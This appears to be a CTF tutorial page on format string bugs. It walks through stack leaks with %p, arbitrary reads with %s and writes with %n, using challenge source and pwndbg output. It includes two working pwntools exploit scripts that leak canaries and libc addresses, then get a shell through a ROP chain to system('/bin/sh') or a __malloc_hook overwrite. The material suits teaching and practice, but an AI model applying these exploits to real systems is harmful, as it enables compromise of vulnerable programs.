Format String Bug
Abusinng format string specifiers to leak and write addresses
TLDR
Requirements
Use of printf
that is directly passed user-supplied input
What can you do with this?
Arbitrary Read - use %p
format specifiers to leak pointers on the stack, potentially revealing interesting information (E.g libc addresses, variables)
Arbitrary Write - determine what pointers you want to override on the stack and utilize the %n
format specifier to do so
Arbitrary Read
Identifying this vulnerablity is relatively straightforward, we aim to find user-supplied input that is directly passed into printf.
The example below is from DownUnderCTF2020 and will be the main challenge we are referencing throughout this page.
#include <stdio.h>
#define INPUT_SIZE 64
#define INPUT_TIMES 3
__attribute__((constructor))
void setup() {
setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 2, 0);
}
int main() {
char buffer[INPUT_SIZE];
int i;
for (i = 0; i < INPUT_TIMES; i++) {
fgets(buffer, INPUT_SIZE, stdin);
printf(buffer);
}
return 0;
}
We see that our user input is directly passed into printf
and we can verify this by using the format specifier %p
which is used to display pointers.

To specifically reference a certain offset (E.g Offset 8), we can use the %offset$p
to print the specific stack pointer value.

This can be used to leak many useful information for stack exploitation like stack canaries, libc addresses and more.
pwndbg> c
Continuing.
%19$p
0x7ffff7821b97
Breakpoint 2, 0x0000555555400866 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────
*RAX 0xf
RBX 0x0
RCX 0x0
RDX 0x7ffff7bed8c0 ◂— 0x0
RDI 0x1
RSI 0x7fffffffbc10 ◂— '0x7ffff7821b97\n'
*R8 0xf
*R9 0x7fffffffba8c ◂— 0xf00007fff
R10 0x0
R11 0x246
R12 0x5555554006d0 (_start) ◂— xor ebp, ebp
R13 0x7fffffffe3f0 ◂— 0x1
R14 0x0
R15 0x0
RBP 0x7fffffffe310 —▸ 0x555555400890 (__libc_csu_init) ◂— push r15
RSP 0x7fffffffe2b0 —▸ 0x7fffffffe2d0 ◂— 0x2
RIP 0x555555400866 (main+73) ◂— add dword ptr [rbp - 0x54], 1
───────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────
► 0x555555400866 <main+73> add dword ptr [rbp - 0x54], 1
0x55555540086a <main+77> cmp dword ptr [rbp - 0x54], 2
0x55555540086e <main+81> jle main+32 <main+32>
0x555555400870 <main+83> mov eax, 0
0x555555400875 <main+88> mov rcx, qword ptr [rbp - 8]
0x555555400879 <main+92> xor rcx, qword ptr fs:[0x28]
0x555555400882 <main+101> je main+108 <main+108>
↓
0x555555400889 <main+108> leave
0x55555540088a <main+109> ret
0x55555540088b nop dword ptr [rax + rax]
0x555555400890 <__libc_csu_init> push r15
────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe2b0 —▸ 0x7fffffffe2d0 ◂— 0x2
01:0008│ 0x7fffffffe2b8 ◂— 0x255600d98
02:0010│ 0x7fffffffe2c0 ◂— 0xa7024393125 /* '%19$p\n' */
03:0018│ 0x7fffffffe2c8 —▸ 0x55555540081a (setup+64) ◂— nop
04:0020│ 0x7fffffffe2d0 ◂— 0x2
05:0028│ 0x7fffffffe2d8 —▸ 0x5555554008dd (__libc_csu_init+77) ◂— add rbx, 1
06:0030│ 0x7fffffffe2e0 —▸ 0x7ffff7c109a0 ◂— push rbp
07:0038│ 0x7fffffffe2e8 ◂— 0x0
──────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────
► 0 0x555555400866 main+73
1 0x7ffff7821b97 __libc_start_main+231
2 0x5555554006fa _start+42
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> address 0x7ffff7821b97
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
Start End Perm Size Offset File
0x7ffff7800000 0x7ffff79e7000 r-xp 1e7000 0 /home/kali/Desktop/Practice/BinaryExploit/malloc_hook_fsb/libc.so.6 +0x21b97
pwndbg>
As you can see above, we are able to leak a libc address 0x7ffff7821b97
.
Assuming you know what offset your input is, you could also leak the contents of a arbitrary pointer by specifying the %s
. Here is an example from WWCTF.
unsigned __int64 slip()
{
char v1[40]; // [rsp+0h] [rbp-38h] BYREF
unsigned __int64 v2; // [rsp+28h] [rbp-10h]
v2 = __readfsqword(0x28u);
puts("\nTry to slip...\nRight or left?");
read(0, v1, 0x1DuLL);
printf(v1);
return v2 - __readfsqword(0x28u);
}
We have a simple printf
vulnerability here and using the %s
format specifier, we can dereference arbitrary memory addresses. To get a LIBC leak, we can provide the puts@GOT
address, which when dereferenced will give us the actual runtime address of puts
in libc.
Below is an excerpt of my solve script where was used to leak libc base.
#!/usr/bin/env python3
from pwn import *
exe = ELF("./buffer_brawl_patched")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.binary = exe
context.log_level = 'debug'
p = process('./buffer_brawl_patched')
gdb.attach(p, gdbscript='break *stack_check_up + 157')
p.recvuntil(b'> ')
p.sendline(b'4')
p.recvuntil(b'Right or left?\n')
p.sendline(b'%11$p.%13$p')
leak = p.recvline().strip(b'\n')
canary = int(leak.split(b'.')[0], 16)
binary_base = int(leak.split(b'.')[1], 16) - 0x1747
log.info(f"Canary is {hex(canary)}")
log.info(f"Base is {hex(binary_base)}")
# Get where our input starts first
exe.address = binary_base
log.info(f"Puts is {hex(exe.got['puts'])}")
p.recvuntil(b'> ')
p.sendline(b'4')
p.recvuntil(b'Right or left?\n')
# Leak puts@GOT
payload =b'%7$s\x00\x00\x00\x00' + p64(exe.got['puts'])
p.sendline(payload)
leak = u64(p.recvline().strip(b'\n').ljust(8, b'\x00'))
libc_base = leak - 163840 - 358240
log.info(f"Libc is {hex(libc_base)}")
# Trigger BOF criteria
for i in range (29):
p.recvuntil(b'> ')
p.sendline(b'3')
libc.address = libc_base
system = libc.sym['system']
binsh = libc.address + 0x1a7e43
log.info(f"/bin/sh is {hex(binsh)}")
pop_rdi = libc.address + 0x000000000002a205
ret = binary_base + 0x0000000000001016
offset = 24
# BOF with canary check + system(ptr_to_bin_sh)
payload = offset * b'A'
payload += p64(canary)
payload += b'A' * 8
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(ret)
payload += p64(system)
payload += p64(ret)
p.recvuntil(b'Enter your move: ')
p.clean()
p.sendline(payload)
p.interactive()
if __name__ == "__main__":
main()
%p
also prints till it reads a null byte \x00
so this can be useful when leaking canaries assuming you have control over the buffer that it is printing for. Below is an example.
switch (idx) {
case 1:
if (pthread_create(&thread_t, NULL, thread_routine, NULL) < 0) {
perror("thread create error");
exit(0);
}
break;
case 2:
printf("Size: ");
scanf("%lu", &size);
printf("Data: ");
read_bytes(global_buffer, size);
// Global buffer is filled with b'A's, so the first null byte it meets is
// the canary as the canary is <7 bytes>/x00 always
printf("Data: %s", global_buffer);
break
Arbitrary Write
Printf's %n
specifier takes in a pointer and writes the number of characters written so far.
Lets take this program for example.
#include<stdio.h>
int main()
{
int c;
printf("geeks for %ngeeks ", &c);
printf("%d", c);
getchar();
return 0;
}
%n
will store the value 10 into the variable c as there where 10 characters printed before %n
was called.
So if we have control of the input, we can have a arbitrary write with %n
.
This can be further automated with the use of pwntools fmtstr_payload
function
payload = fmtstr_payload(offset, {location : value})
Lets see how we can leverage on printf
only to obtain a shell.
#!/usr/bin/env python3
from pwn import *
exe = ELF("./echos_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.27.so")
context.update(arch='amd64', os='linux')
p = process("./echos_patched")
# 1. First we leak the libc address 0x7ffff7821b97 (__libc_start_main+231) - libc.so.6 +0x21b97
p.sendline(b'%19$p')
leak = int(p.recvline(),16)
libc.address = leak - 0x21b97
log.info(f"Libc Address Leak : {hex(libc.address)}")
malloc_hook = libc.symbols["__malloc_hook"]
log.info(f"malloc_hook address : {hex(malloc_hook)}")
# 2. Next, we write the one_gadget address to the __malloc_hook address
one_gadget = libc.address + 0x4f322
log.info(f"one_gadget address : {hex(one_gadget)}")
payload = fmtstr_payload(8, {malloc_hook : one_gadget}, write_size="int")
p.sendline(payload)
pause()
# 3. Lastly trigger the _malloc_hook with a huge printf
p.sendline(b'%66000c')
p.interactive()
We perform a stack leak with printf using the
%p
to list out the value of the pointers on the stack. Since we know that we need a libc-leak, we target the 19th offset using the format%offset$p
Using the libc leak, we are able to get the address of
__malloc_hook
which will be useful as printf callsmalloc
We can then write the address of a one_gadget into &__malloc_hook using pwntools's
fmtstr_payload
For our last printf call, we can trigger malloc by passing a large input (E.g passing
%65510c
) which triggersmalloc()
which in turn triggers__malloc_hook
, calling our one_gadget and giving us a shell
Let's look a example where pwntools cannot save us and we have to do a manual write.
#include <cstdio>
#include <stdlib.h>
bool check(char* s) {
char tmp[384] = {0,};
int i = 0, j = 0, cnt = 0;
bool run = false;
for (; i < 384; i++) {
j = 0;
if (s[i] != '%') continue;
cnt += 1;
i += 1;
if (s[i] == '0') {
// don't waste space!!
return false;
}
while (s[i] >= '0' && s[i] <= '9') {
tmp[j] = s[i];
i += 1;
j += 1;
}
if (j <= 1) {
return false;
}
tmp[j] = 0;
int fmt_val = strtol(tmp, (char**)(&tmp), 10);
if (fmt_val >= 58) {
return false;
}
}
return true;
}
int main(int argc, char** argv, char** envp) {
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
char s[384] = {0,};
while(1) {
printf(">> ");
fgets(s, 384, stdin);
if (check(s)) printf(s);
else break;
}
return 0;
}
// gcc chall.cpp -o chall -O0 -Wno-format-security -Wl,-z,relro,-z,lazy -no-pie
First thought is to just do simple GOT overwrite with a one_gadget but strtol
mandates us to have two digit input but less than 58 after a %
character, this means that if we use %<no of char>c%offset$hhn
, we can only write the range from 10-57.
S
Misc Stuff
To determine if the value you leaked is a libc address, just use the
address()
function in pwndbg and check for rwx withvmmmap
printf usually parses the first 1 to 5 offset as parameters so your buffer containing your input should start from offset 6 onwards
printf has a internal counter when printing characters which is especially important when chaining multiple
%n
calls.This means you can do something like this
%57c%10$hhnn%57c%10$hhn
==%114c%10$hhn
Last updated